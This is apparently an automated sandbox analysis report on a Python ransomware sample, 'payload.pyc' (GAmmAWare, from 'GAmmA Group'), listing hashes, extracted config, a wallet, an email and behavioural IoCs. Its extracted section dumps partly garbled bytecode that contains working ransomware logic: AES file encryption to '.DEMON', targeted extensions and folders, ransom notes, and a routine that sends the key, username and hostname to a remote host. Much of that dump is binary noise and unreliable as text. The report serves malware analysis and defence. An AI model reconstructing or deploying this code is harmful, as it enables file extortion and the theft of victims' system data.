273ffc020f3bae8049be32d6b73371f35147f84ef19dfdad91217cdca3632d23

Resubmissions

13-07-2024 18:55

240713-xk64bstakj 10

13-07-2024 18:50

240713-xg3xhavfjb 10

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-de
resource tags

arch:x64arch:x86image:win10v2004-20240709-delocale:de-deos:windows10-2004-x64systemwindows
submitted
13-07-2024 18:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

payload.pyc
Size

15KB
MD5

4b76ff757725df04c8826dea29042aad
SHA1

977f51c0937b0143ce1ba7bdc7e6b76bf6496272
SHA256

a49c0e751f17791a2c908adc613ecf18b6ec1d9e3e4c289cc9ef7e02f9a46235
SHA512

1f8555ab06625b5be4c976c0d80d9fd01536001e7aebf58713ed1d06e0e3254c38060c31b6ae05e3725332d688becc0b4de4d75fd53bce356eee669b2eff659d
SSDEEP

384:NJjEY267618D5kbOSCH3r7X5sVIMz6NB+3K2JMzJUom:DjE/318lKEkIKuBSKJ3m

Score

10^/10

ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\UUd9PgZ3.pyc.part

Ransom Note

B ��@��s��d�dl�Z�d�dlZd�dlZd�dlZd�dlZd�dlZd�dlZd�dlZd�dlZd�dl Z d�dl Z d�dlZd�dlZ d�dlZ d�dlmZ�d�dlT�d�dlT�d�dlmZ�d�dlmZ�d�dlmZ�G�dd��de�Zd d ��Zdejej�fdd �Zdd��Zd8dd�Z dd��Z!dZ"dZ#e�$e��%d��&��Z'e'�%d�Z'e�(��a)e�*��Z+ddddddddd d!d"d#d$d%d&d'd(d)d*d+d,d-d.d/d0d1gZ,d2d3��Z-d4d5��Z.d6d7��Z/y e/��W�n �e0k �r��e�1d��Y�nX�dS�)9��N)�Path)�*)�BytesIO)�Random)�AESc��@��s��e�Zd�Zdd��ZdS�)� mainwindowc��sT��t��jdd��dd��jdd��dd��t��_��j�d��d }t j �tt �|��}|�d t j j�}t j�|�}t��|dd�}||_|jddd d��t��|dd�}||_|jddd d��d}t��|dddd�jdddd��t��ddddd�jdd d��t��ddddd�jdd d��fdd�}��fdd��tdk�rJn|��d�S�) NzTango Down!)�stringr��black)� backgroundz-fullscreenT�clama�$��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 )��r��)�imager ��)�row�column�rowspan��a��Tango Down Bitch! Seems like you got hit by GAmmA Group! Don't Panic, you get to have your files back! GAmmAWare uses a basic encryption script to lock your files. This type of ransomware is known as CRYPTO. You'll need a decryption key to unlock your files. Your files will be deleted when the timer runs out, so you better hurry. You have 10 hours to find your key! Payment is accepted with Bitcoin only, Or Google [How to buy Bitcoin] Payment 0.052 BTC to: 1sd2WD1fEJnUPkGgfTEciWENKtLeUGMQe After Payment is confirmed Please Email: [email protected] with your IP/hostname & BTC transaction ID to receive your decryption key. Kind regards, GAmmA GrouP zHelvetica 16 bold�white�red)�text�font� foregroundr ��)r��r�� columnspan��zHelvetica 18 bold)r��r��c��s��t�j��d�}�d|�_|��d�S�)N)�targetT)� threading�Thread�daemon�start)�thread)�start_timer�� payload.py�start_thread��s��z)mainwindow.__init__.<locals>.start_threadc��s��t��ddddd�jdddd ��y\d }�xR|�rvt|�d�\}}d�||�}t��|dddd�jd ddd ��t�d��|�d8�}�q&W�W�n�tk r��td��Y�nX�d�S�)Nz TIME LEFT:zHelvetica 18 boldr��r ��)r��r��r��r ��r��r��r��)r��r��r��i��<��z {:02d}:{:02d}r��z Closed...)�Label�grid�divmod�format�time�sleep�KeyboardInterrupt�print)�s�min�sec� time_left)�selfr$��r%��r#��s�� z(mainwindow.__init__.<locals>.start_timer�Windows)�Tk�__init__�title� resizable� configure� attributes�Style�style� theme_use�PIL�Image�openr��base64� b64decode�resize� ANTIALIAS�ImageTk� PhotoImager)��r ��r*��os)r5�� photo_code�photo�resized�label�messager&��r$��)r5��r#��r%��r8��s4�� | zmainwindow.__init__N)�__name__� __module__�__qualname__r8��r$��r$��r$��r%��r��s��r��c��C��s&��t��t�jt�j�}�|��d��|��d�S�)N)z8.8.8.8�P��r��)�socket�AF_INET� SOCK_DGRAM�connect�getsockname)r1��r$��r$��r%�� getlocalip��s�� rX��@��c��s��d��fdd�t|��D��S�)Nr��c��3��s��|�]}t��V��qd�S�)N)�random�choice)�.0�_)�charsr$��r%�� <genexpr>��s��zgen_string.<locals>.<genexpr>)�join�range)�sizer^��r$��)r^��r%�� gen_string��s��rc��c��C��s��|�dt�jt|��t�j��S�)N��)r�� block_size�len)r1��r$��r$��r%��pad��s��rg��c��C��s6��t�|��}�t��tj�}t�|tj|�}||�|��S�)N)rg��r��new�readr��re��MODE_CBC�encrypt)rN��key�key_size�iv�cipherr$��r$��r%��rl��s��rl��c�� C��s\��t�|�d��}|��}W�d�Q�R�X�t||�}t�|�d��}|�|��W�d�Q�R�X�t�|�|�d��d�S�)N�rb�wbz.DEMON)rB��rj��rl��writerI��rename)� file_namerm��fo� plaintext�encr$��r$��r%��encrypt_file��s�� ry��zcareerscannabi11.ddnsking.comi#��zutf-8z.txtz.pptz.pptxz.docz.docxz.gifz.jpgz.pngz.icoz.mp3z.oggz.csvz.xlsz.exez.pdfz.odsz.odtz.kdbxz.kdbz.mp4z.flvz.isoz.zipz.tarz.tar.gzz.rarc��C��s��t�t��d�S�)N�/)�strr��homer$��r$��r$��r%�� get_target��s��r}��c��C��s@��d}d}ddddddd g}y�x�|D�]�}|�|�d �}x�t��|�D�]�\}}} xl| D�]d} x^tD�]V}| �|��rXy tt�j�|| �|��|d7�}W�qX�tk r��}�zW�d�d�}~X�Y�qXX�qXW�qNW�y0t |d�d ��} | � |��| ��W�d�Q�R�X�W�q>�tk �r �}�zW�d�d�}~X�Y�q>X�q>W�q"W�W�n$�tk �r:�}�zW�d�d�}~X�Y�nX�d�S�)Na��Tango Down Bitch! Seems like you got hit by GAmmA Group! Don't Panic, you get to have your files back! GAmmAWare uses a basic encryption script to lock your files. This type of ransomware is known as CRYPTO. You'll need a decryption key to unlock your files. Your files will be deleted when the timer runs out, so you better hurry. You have 10 hours to find your key! Payment is accepted with Bitcoin only, Or Google [How to buy Bitcoin] Payment 0.052 BTC to: 1sd2WD1fEJnUPkGgfTEciWENKtLeUGMQe After Payment is confirmed Please Email: [email protected] with your IP/hostname & BTC transaction ID to receive your decryption key. Kind regards, GAmmA GrouP r�� Downloads� Documents�Pictures�Music�Desktop�Onedrive�Dropboxrz��r(��z/README.txt�w)rI��walk�ext�endswith�lowerry��pathr`�� ExceptionrB��rs��close)�prm��rN��c�dirs�xr��r��subdirs�files�name�i�e�fr$��r$��r%�� start_encrypt!��s:�� r��c�� C��s��t��t�j�}�|��d��yT|��ttf��dt��ttt � ��tf�}|��|� d��tt��t��t��}|��W�n<�tk r��}�ztt��t��t��}|��W�d�d�}~X�Y�nX�d�S�)N� ��z%s$%s$%s$%s$%szutf-8)rS��rT�� settimeoutrV��host�portrX��os_platformrm��getpass�getuser�hostname�send�encoder��r}��r��mainloopr��)�server�msg�mainr��r$��r$��r%�� connectorb��s��

Emails

[email protected]

Wallets

1sd2WD1fEJnUPkGgfTEciWENKtLeUGMQe

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 24 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\pyc_auto_file	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\瑴is\ = "pyc_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\㝢춤耀੠䌝ˈ\ = "pyc_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\敲ds\ = "pyc_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\㝠춺退ꆘ䊯ˈ\ = "pyc_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\pyc_auto_file\shell\open\command\ = "\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\.pyc\ = "pyc_auto_file"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\䌟ˈ\ = "pyc_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\瑴is	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\੠䌝ˈ	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\pyc_auto_file\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\pyc_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\pyc_auto_file\shell\open\command	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\㝢춤耀੠䌝ˈ	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\੠䌝ˈ\ = "pyc_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\瘠䊯ˈ	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\.pyc	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\䌟ˈ	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\敲ds	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\㝠춺退ꆘ䊯ˈ	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\瘠䊯ˈ\ = "pyc_auto_file"	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3832	firefox.exe
Token: SeDebugPrivilege	3832	firefox.exe
Token: SeDebugPrivilege	3832	firefox.exe
Token: SeDebugPrivilege	3832	firefox.exe
Token: SeDebugPrivilege	3832	firefox.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
3832	firefox.exe
3832	firefox.exe
3832	firefox.exe
3832	firefox.exe
3832	firefox.exe
3832	firefox.exe
